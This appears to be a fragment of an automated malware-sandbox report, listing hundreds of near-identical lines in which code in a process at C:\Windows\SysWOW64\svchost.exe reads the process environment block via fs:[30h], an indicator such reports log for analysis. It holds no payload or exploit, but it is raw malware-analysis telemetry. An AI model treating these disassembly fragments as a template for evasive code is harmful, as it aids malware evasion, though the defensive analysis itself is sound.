                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA38 mov eax, dword ptr fs:[00000030h]1_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
